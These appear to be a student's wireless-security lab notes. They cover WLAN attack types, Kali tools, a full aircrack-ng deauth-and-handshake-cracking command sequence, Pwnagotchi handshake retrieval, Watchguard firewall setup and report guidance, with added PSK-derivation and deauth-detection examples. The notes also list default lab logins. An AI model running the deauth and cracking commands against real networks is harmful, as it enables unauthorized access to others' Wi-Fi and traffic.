- Interrupt connection between access point and mobile device, capture reconnect to crack password
- Used captured network traffic from Riccarton Mall and crack authentication dialogues
WLAN Attack Taxonomy
Passive attacks:
- Traffic analysis
- Packet size, type, fragmentation info etc.
- APs periodically send out beacon frames
- Eavesdropping
- Requires wireless cards with passive packet sniffing (and active packet injection for active attacks)
Active attacks:
- Unauthorized access
- Masquerade as a legitimate user
- Access to wireless components may give access to wired components
- Rogue access points (Evil-Twin attack)
- Interrupt connection, then device automatically reconnects to strongest matching AP
- Man-in-the-middle attacks
- ARP spoofing - spoof MAC of access point and victim to force all traffic to pass through attacker
- Session hijacking
- Spoof MAC and force disconnect - in some architectures re-authentication not required
- Replay
- Capture authentication packets, replay them later
- Denial of Service
- Attacks against layer 1 (physical) or 2 (data link) cannot be stopped
- NZ stock exchange attack: attacked DNS server
PSK (pre-shared key) used in labs: each node has string/passphrase that is combined with network SSID to generate unique encryption key for each client and session.
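The derivation behind that sentence is the standard WPA/WPA2-Personal one: PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes), and in WPA2-Personal this PSK is the PMK that both sides later prove possession of in the four-way handshake. The following is an added worked example (not from the lab notes or the aircrack-ng project) that computes it with the Python standard library and checks the result against the IEEE 802.11i Annex H test vector ("password" / "IEEE"). The practical point for a defender is visible in the code: the SSID acts as the salt, so the same passphrase gives a different PSK on every network, and the only thing protecting a captured handshake from a dictionary run is the strength of the passphrase itself.

```python
"""WPA/WPA2-Personal PSK derivation (IEEE 802.11i): added example, not lab or project code."""
import hashlib

WPA_PBKDF2_ITERATIONS = 4096   # fixed by the standard
WPA_PSK_LEN = 32               # 256-bit PSK (= PMK in WPA2-Personal)


def derive_psk(passphrase: str, ssid: str) -> bytes:
    """Return the 256-bit PSK for an ASCII passphrase on the given SSID."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8-63 ASCII characters")
    return hashlib.pbkdf2_hmac(
        "sha1",
        passphrase.encode("ascii"),
        ssid.encode("utf-8"),          # the SSID is the PBKDF2 salt
        WPA_PBKDF2_ITERATIONS,
        dklen=WPA_PSK_LEN,
    )


def psk_hex(passphrase: str, ssid: str) -> str:
    return derive_psk(passphrase, ssid).hex()


# Published test vector from IEEE 802.11i Annex H.4.1 (also used in wpa_supplicant's self-tests).
IEEE_TEST_PASSPHRASE = "password"
IEEE_TEST_SSID = "IEEE"
IEEE_TEST_PSK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def matches_ieee_test_vector() -> bool:
    """True if our derivation reproduces the standard's published PSK."""
    return psk_hex(IEEE_TEST_PASSPHRASE, IEEE_TEST_SSID) == IEEE_TEST_PSK


def ssid_changes_psk(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """Demonstrates the SSID-as-salt property: same passphrase, different network, different key."""
    return derive_psk(passphrase, ssid_a) != derive_psk(passphrase, ssid_b)


if __name__ == "__main__":
    print("test vector ok:", matches_ieee_test_vector())
    # 'LabNet' and 'OtherNet' are constructed SSIDs for illustration only.
    print("PSK differs across SSIDs:", ssid_changes_psk("correcthorsebattery", "LabNet", "OtherNet"))
```

Because the derivation is deterministic and salted only by the public SSID, any tool that holds a captured four-way handshake can test candidate passphrases offline at the cost of 4096 HMAC-SHA1 iterations each, which is exactly why the lab's dictionary step works against weak passphrases and why a long random passphrase (or WPA2 Enterprise, see below) is the mitigation.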
Tools
Several tools available pre-installed in Kali-Linux
- airmon-ng: set wireless adapter to monitor mode to sniff packets meant for other devices
- kismet: wireless network detector, packet sniffer
- iwconfig: check wireless adapter is in monitor mode
- airodump-ng: capture packets and display access point properties (ethernet address, channel number, speed, etc.)
- aireplay-ng: issue deauthentication packets and capture the automatic reconnection dialogue
- aircrack-ng: decrypting keys captured by aireplay-ng
- airbase-ng: establishing access point for evil-twin attack
- macchanger: view/spoof MAC address
(‘ng’ stands for ‘next generation’ - basically version 2)
Login:
- cyberlab: $CyberLab!
- root: toor
WPA/WPA2 Password Cracking
- Kill DHCP server: ps -eaf | grep dhc, then kill -9 {process_id}
- iwconfig to find interface name
- airodump-ng {wireless_interface}: scan for networks, determine channel number and MAC address (BSSID - basic service set identifier) of target AP
- airmon-ng stop {wireless_interface}
- airmon-ng start {wireless_interface} {channel_number} to enable monitor mode for a specific channel
- iwconfig to find the new monitoring network interface's name
- airodump-ng -c {ap_channel} --bssid {ap_mac} -w {capture_file_path} {wireless_interface}
  - Continue running the command
  - BSSID is the AP MAC, STATION is the victim's MAC
- aireplay-ng -0 1 -a {ap_mac} -c {victim_mac} {wireless_interface}
  - Send 1 de-authentication packet (-0 1 is short for --deauth=1)
  - The device will then automatically reconnect
  - airodump-ng will be able to capture the four-way handshake
  - PSK (pre-shared key) derived from passphrase. Both parties need to prove they hold the key without sending it over the wire
- (Optional) To see it working, go to Wireshark, select correct interface (Capture -> Options), filter using eapol (Extensible Authentication Protocol over LAN)
- aircrack-ng -w {path_to_dictionary} -b {ap_mac} {capture_file_path}
  - Cracks captured password (-b takes the target AP's BSSID)
  - Unzip gzip files: gunzip {path}
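Seen from the other side of the lab, the procedure above leaves two observable traces on the air: a run of deauthentication frames carrying the AP's BSSID as sender, followed shortly by the victim station's EAPOL four-way handshake. The following is an added example (not from the lab notes or any tool listed above) of the detection logic a wireless IDS such as kismet applies, run over a constructed frame log that is assumed, not captured. It flags any sender whose deauth rate exceeds a threshold inside a sliding window, and separately flags a station that re-handshakes within a short gap after being deauthenticated, which catches even a single deauth frame. The corresponding mitigation is Protected Management Frames (IEEE 802.11w), which makes deauthentication frames authenticated so a spoofed one is discarded.

```python
"""Deauth-then-rehandshake detection over a constructed 802.11 frame log (added example)."""
from collections import defaultdict, deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    ts: float       # seconds since start of capture
    subtype: str    # "beacon", "data", "deauth" or "eapol"
    src: str        # transmitter MAC
    dst: str        # receiver MAC


# Constructed sample capture (assumed addresses, not real traffic):
# normal traffic, then six deauth frames spoofed with the AP's BSSID aimed at one
# station, then that station's four EAPOL handshake messages, then normal traffic.
AP = "00:11:22:33:44:55"
STA = "66:77:88:99:aa:bb"
BCAST = "ff:ff:ff:ff:ff:ff"
SAMPLE = [
    Frame(0.0, "beacon", AP, BCAST),
    Frame(1.0, "data", STA, AP),
    Frame(2.0, "data", AP, STA),
    Frame(10.0, "deauth", AP, STA),
    Frame(10.1, "deauth", AP, STA),
    Frame(10.2, "deauth", AP, STA),
    Frame(10.3, "deauth", AP, STA),
    Frame(10.4, "deauth", AP, STA),
    Frame(10.5, "deauth", AP, STA),
    Frame(12.0, "eapol", AP, STA),   # message 1 of 4
    Frame(12.1, "eapol", STA, AP),   # message 2 of 4
    Frame(12.2, "eapol", AP, STA),   # message 3 of 4
    Frame(12.3, "eapol", STA, AP),   # message 4 of 4
    Frame(13.0, "data", STA, AP),
]


def deauth_rate_alerts(frames, window_s=10.0, threshold=5):
    """Return {sender: first_ts} for senders with >= threshold deauth frames in any window_s span."""
    recent = defaultdict(deque)   # sender -> timestamps of its recent deauth frames
    flagged = {}
    for f in sorted(frames, key=lambda fr: fr.ts):
        if f.subtype != "deauth":
            continue
        q = recent[f.src]
        q.append(f.ts)
        while q and f.ts - q[0] > window_s:   # drop frames that fell out of the window
            q.popleft()
        if len(q) >= threshold and f.src not in flagged:
            flagged[f.src] = q[0]
    return flagged


def rehandshake_alerts(frames, max_gap_s=30.0):
    """Return [(station, deauth_ts, eapol_ts)] where a station starts an EAPOL exchange
    within max_gap_s of a deauth frame addressed to it. One deauth frame is enough."""
    last_deauth = {}   # station -> ts of most recent deauth addressed to it
    alerts = []
    for f in sorted(frames, key=lambda fr: fr.ts):
        if f.subtype == "deauth":
            last_deauth[f.dst] = f.ts
        elif f.subtype == "eapol":
            for party in (f.src, f.dst):
                t = last_deauth.pop(party, None)
                if t is not None and f.ts - t <= max_gap_s:
                    alerts.append((party, t, f.ts))
    return alerts


if __name__ == "__main__":
    print("deauth bursts:", deauth_rate_alerts(SAMPLE))
    print("re-handshakes after deauth:", rehandshake_alerts(SAMPLE))
```

On the constructed sample the first function reports the AP address as a burst source starting at t=10.0 and the second reports the station re-handshaking 1.5 s after its last deauth. On a real capture the burst detector alone would miss a single well-timed deauth, and a legitimate AP does occasionally send deauths, so the handshake-follows-deauth correlation is the stronger signal of the two.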
Pwnagotchi
- Connect via USB
- ifconfig -a: ensure usb0 is being used as networking device
- ifconfig usb0 10.0.0.1/24: set IP of device
- scp -r pi@10.0.0.2:/root/handshakes ~/handshakes: copy files from Pwnagotchi to computer
- Pwnagotchi contains PCAP files with format {SSID name}_{BSSID}.pcap
Enterprise Security
- External interface: network that presents the security threat
- Trusted interface: private LAN/internal interface
- Optional interface: DMZ/mixed trust area. APs go here
Watchguard:
- All-in-one firewall + switch + wireless AP
- IP address of the Watchguard device: default gateway
- Add HTTP packet filter
- Basically a port filter: only allows TCP traffic on port 80
- HTTP proxy allows packet contents to be inspected
- Allow traffic From Any-Optional To Any-Trusted
- Initial connection must be from outside to inside
- Set up wireless interface
- Note IP and CIDR of interface 2
- Create new bridge with IP and CIDR from above, optional security zone and DHCP enabled
- Set interface 2 to bridge type, set bridge to the one made above
- Enable wireless AP in bridge mode (using bridge from above)
- At this point devices should be able to connect to the AP, and the firewall rule allows HTTP traffic from device to server connected to any trusted network
- WPA2 Enterprise: can either set wireless network to use Firebox DB or RADIUS server (e.g. Active Directory) for authentication
Write-up
- Explain importance of software security, brief example of experiments done in labs
- Own diagrams - no copying off internet/lab notes, or scans of hand-drawn diagrams
- References to supplement writing
- Observations: potential risks, areas of interest
- Some research and comments
- Target audience: write recommendations as if to a technical but not security focused manager
- ~2000 words
- Describe what the risks of the insecurities are
- Introduction and conclusion alone should give a good overview of problems and recommendations
Structure:
- Title
- Author
- Abstract: purpose and findings
- Introduction:
- Description of experiments, equipment, tools, techniques
- Vulnerabilities demonstrated
- Diagrams of equipment/system
- Experimental results:
- Explanation of experiments, importance of results
- A few screenshots and their explanations
- Relate to cybersecurity disasters
- Conclusions: (in)adequacy of setup results
- Comments on prevalence of security issues in current systems, organizations
- References (optional)